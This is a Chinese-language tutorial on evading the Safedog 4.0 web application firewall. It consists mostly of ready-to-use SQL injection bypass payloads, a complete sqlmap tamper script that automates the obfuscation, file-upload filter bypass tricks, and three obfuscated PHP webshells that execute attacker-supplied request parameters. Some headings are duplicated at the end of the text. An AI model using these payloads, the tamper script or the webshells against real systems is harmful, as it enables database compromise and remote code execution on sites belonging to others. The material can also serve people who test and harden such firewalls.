Bypass安全狗4.0技术详解<\/h1>

SQL注入绕过技术<\/h2>

1=1绕过方法<\/h3>
安全狗会拦截'and 1=1-- -<\/code>这类常见注入语句，但可以通过以下方式绕过：<\/p>


使用URL编码的&符号<\/strong>：<\/p>
'%261-- -
<\/span><\/span><\/span>'<\/span>%<\/span>26<\/span>true<\/span>-- -
<\/span><\/span><\/span><\/span>'%260-- -
<\/span><\/span><\/span>'<\/span>%<\/span>26<\/span>false<\/span>-- -
<\/span><\/span><\/span><\/code><\/pre><\/li>

使用XOR运算符<\/strong>：<\/p>
'Xor 1-- -
<\/span><\/span><\/span>'<\/span>Xor true<\/span>-- -
<\/span><\/span><\/span><\/code><\/pre><\/li>

使用数学表达式<\/strong>：<\/p>
'or -1=-1-- -
<\/span><\/span><\/span>'<\/span>or<\/span> -<\/span>0<\/span>=-<\/span>0<\/span>-- -
<\/span><\/span><\/span><\/code><\/pre><\/li>

内联注释<\/strong>：<\/p>
'or \/*!1=1*\/-- -
<\/span><\/span><\/span><\/code><\/pre><\/li>

直接绕过and\/or关键字<\/strong>：<\/p>
\/*!11440OR*\/<\/span>
<\/span><\/span>\/*!11440AND*\/<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
ORDER BY绕过<\/h3>


使用注释和换行<\/strong>：<\/p>
order<\/span>%<\/span>23<\/span>%<\/span>0<\/span>aby 3<\/span>
<\/span><\/span><\/code><\/pre><\/li>

复杂内联注释<\/strong>：<\/p>
'\/*!order \/*!\/*\/**\/by*\/4-- -
<\/span><\/span><\/span>'<\/span>\/*!order \/*\/*%\/**\/by*\/4-- -
<\/span><\/span><\/span>'\/*!order \/*!\/*\/**\/\/**\/by*\/4-- -
<\/span><\/span><\/span>'\/*!order \/*!\/*\/**\/\/*\/**\/by*\/4-- -
<\/span><\/span><\/span><\/code><\/pre><\/li>

特殊注释格式<\/strong>：<\/p>
\/*!11440order*\/<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
UNION SELECT绕过<\/h3>


内联注释与注释混淆<\/strong>：<\/p>
'\/*!union\/*!\/*\/**\/*\/select\/**\/1,2,'<\/span>cl4y'-- -
<\/span><\/span><\/span><\/code><\/pre><\/li>

特殊注释格式<\/strong>：<\/p>
\/*!11440union*\/<\/span>
<\/span><\/span>\/*!select\/*!\/*\/**\/*\/
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
系统函数绕过<\/h3>

分隔函数名和括号<\/strong>：
version<\/span> ()      #<\/span> 直接空格<\/span>
<\/span><\/span>user<\/span>%<\/span>0<\/span>a()       #<\/span> 使用<\/span>%<\/span>0<\/span>a~%<\/span>20<\/span>等换行符<\/span>
<\/span><\/span>database<\/span>\/**\/<\/span>()  #<\/span> 使用注释符<\/span>
<\/span><\/span>user<\/span>\/*!*\/<\/span>()     #<\/span> 使用内联注释<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
函数名绕过<\/h3>
在报错注入时可以使用以下格式：<\/p>
\/*!extractvalue\/*!\/*\/**\/*\/
<\/span><\/span><\/span>\/*!updatexml\/*!\/*\/**\/*\/
<\/span><\/span><\/span><\/code><\/pre>information_schema.*绕过<\/h3>
安全狗会检测information_schema相关查询，但MySQL 5.6.x及以上版本可以使用以下表替代：<\/p>

innodb_index_stats<\/code><\/li>
innodb_table_stats<\/code><\/li>
<\/ul>
万能绕过payload<\/h3>
安全狗通过正则匹配关键字，可以通过以下方式使关键字不被单独分离出来：<\/p>
\/*!union\/*!\/*\/**\/*\/select\/**\/
<\/span><\/span><\/span>\/*!database\/*!\/*\/**\/*\/()\/**\/
<\/span><\/span><\/span>\/*!order\/*!\/*\/**\/*\/by\/**\/
<\/span><\/span><\/span>\/*!union\/*!\/*\/**\/*\/
<\/span><\/span><\/span>\/*!updatexml\/*!\/*\/**\/*\/
<\/span><\/span><\/span>\/*!extractvalue\/*!\/*\/**\/*\/
<\/span><\/span><\/span><\/code><\/pre>Tamper脚本示例<\/h3>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span># -*- coding: UTF-8 -*-<\/span>
<\/span><\/span>
<\/span><\/span>from<\/span> lib.core.enums import<\/span> PRIORITY
<\/span><\/span>from<\/span> lib.core.settings import<\/span> UNICODE_ENCODING
<\/span><\/span>
<\/span><\/span>__priority__ =<\/span> PRIORITY.<\/span>LOWEST
<\/span><\/span>
<\/span><\/span>def<\/span> dependencies<\/span>():
<\/span><\/span>    pass<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> tamper<\/span>(payload, **<\/span>kwargs):
<\/span><\/span>    if<\/span> payload:
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("="<\/span>,"\/*!*\/=\/*!*\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("ORDER"<\/span>,"\/*!ORDER\/*!\/*\/**\/*\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("AND"<\/span>,"\/*!AND\/*!\/*\/**\/*\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("OR"<\/span>,"\/*!OR\/*!\/*\/**\/*\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("UNION"<\/span>,"\/*!UNION\/*!\/*\/**\/*\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("SELECT"<\/span>,"\/*!SELECT\/*!\/*\/**\/*\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("USER()"<\/span>,"\/*!USER\/*!\/*\/**\/*\/()\/**\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("DATABASE()"<\/span>,"\/*!DATABASE\/*!\/*\/**\/*\/()\/**\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("VERSION()"<\/span>,"\/*!VERSION\/*!\/*\/**\/*\/()\/**\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("SESSION_USER()"<\/span>,"\/*!SESSION_USER\/*!\/*\/**\/*\/()\/**\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("EXTRACTVALUE"<\/span>,"\/*!EXTRACTVALUE\/*!\/*\/**\/*\/()\/**\/"<\/span>)
<\/span><\/span>        payload=<\/span>payload.<\/span>replace("UPDATEXML"<\/span>,"\/*!UPDATEXML\/*!\/*\/**\/*\/"<\/span>)
<\/span><\/span>    return<\/span> payload
<\/span><\/span><\/code><\/pre>文件上传绕过技术<\/h2>
环境：Windows + Apache 2.4 + 安全狗4.0<\/p>
绕过方法<\/h3>


文件名回车绕过<\/strong>：<\/p>

在文件名中添加回车符<\/li>
<\/ul>
<\/li>

双等号绕过<\/strong>：<\/p>

使用==<\/code>代替=<\/code><\/li>
<\/ul>
<\/li>

双写filename参数<\/strong>：<\/p>

构造诡异的request包，如filename=;<\/code><\/li>
<\/ul>
<\/li>

%00截断<\/strong>：<\/p>

在文件名后添加%00<\/code>，然后CTRL+SHIFT+U转成字符<\/li>
不需要添加.jpg后缀<\/li>
<\/ul>
<\/li>
<\/ol>
免杀Webshell示例<\/h3>

字符串拼接方式<\/strong>：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>$a=<\/span>'ass'<\/span>;
<\/span><\/span>$b=<\/span>'ert'<\/span>;
<\/span><\/span>$funcName=<\/span>$a.<\/span>$b;  \/\/assert
<\/span><\/span><\/span><\/span>$x=<\/span>'funcName'<\/span>;
<\/span><\/span>
<\/span><\/span>$$<\/span>
<\/span><\/span>x<\/span>($_REQUEST['Name'<\/span>]);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
类析构函数方式<\/strong>：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>class<\/span> User<\/span> {
<\/span><\/span>    public<\/span> $name=<\/span>''<\/span>;
<\/span><\/span>    function<\/span> __destruct(){
<\/span><\/span>        eval<\/span>("<\/span>$this->name<\/span>"<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>$user=<\/span>new<\/span> User<\/span>;
<\/span><\/span>$user-><\/span>name<\/span>=<\/span>''<\/span>.<\/span>$_REQUEST['a'<\/span>];
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>
函数返回方式<\/strong>：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>function<\/span> a<\/span>($a){
<\/span><\/span>    return<\/span> $a;
<\/span><\/span>}
<\/span><\/span>eval<\/span> (a<\/span>($_REQUEST)['hh'<\/span>]);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>总结<\/h2>

安全狗的防护主要基于正则表达式匹配特定关键字和模式<\/li>
通过混淆关键字、使用特殊编码、构造异常请求包等方式可以有效绕过<\/li>
对于SQL注入，重点是分离关键字和混淆语法结构<\/li>
对于文件上传，重点是构造异常但服务器能解析的请求格式<\/li>
保持关注MySQL新版本特性，可能提供新的绕过思路<\/li>
<\/ol>
Bypass安全狗4.0技术详解<\/h1>

SQL注入绕过技术<\/h2>

文件上传绕过技术<\/h2> 环境：Windows + Apache 2.4 + 安全狗4.0<\/p>

文件上传绕过技术<\/h2>
环境：Windows + Apache 2.4 + 安全狗4.0<\/p>
